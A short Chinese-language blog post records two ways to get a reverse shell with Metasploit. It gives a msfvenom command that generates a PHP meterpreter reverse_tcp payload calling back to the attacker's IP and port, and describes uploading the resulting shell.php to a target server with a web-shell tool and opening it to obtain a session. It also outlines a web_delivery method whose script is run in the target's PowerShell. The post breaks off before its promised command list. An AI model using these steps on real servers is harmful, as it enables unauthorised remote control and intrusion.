今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗
反弹shell的两种方法
第一种Msfvenom实例:
1、msfconsole #启动msf
2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php #生成反弹shell文件
LHOST表示本地攻击机的ip, LPORT表示本地攻击机的端口。
其他msf下的各种生成payload命令可参考:https://www.cnblogs.com/backlion/p/6000544.html
这样我们就成功生成了一个shell.php文件。
3、接下来我们需要在本机中监听4444端口。
![]()
这就表示开始本机开始监听4444端口了。
4、现在把shell.php文件通过菜刀上传至目标服务器中,然后本地游览器访问shell.php
即可以看见成功返回了一个session
sessions -i #查看当前可用会话
第二种web_delivery实例流程:
1、msfconsole #启动msf
2、show options #目的是看exploit target为什么脚本
这里默认为pyhton,需要更改为php
![]()
show payloads #挑选payload,选择php/meterpreter/reverse_tcp
然后设置lhost
得到一段脚本,将这段脚本在目标机的powershell中执行即可反弹shell。
下面贴一些常用的命令: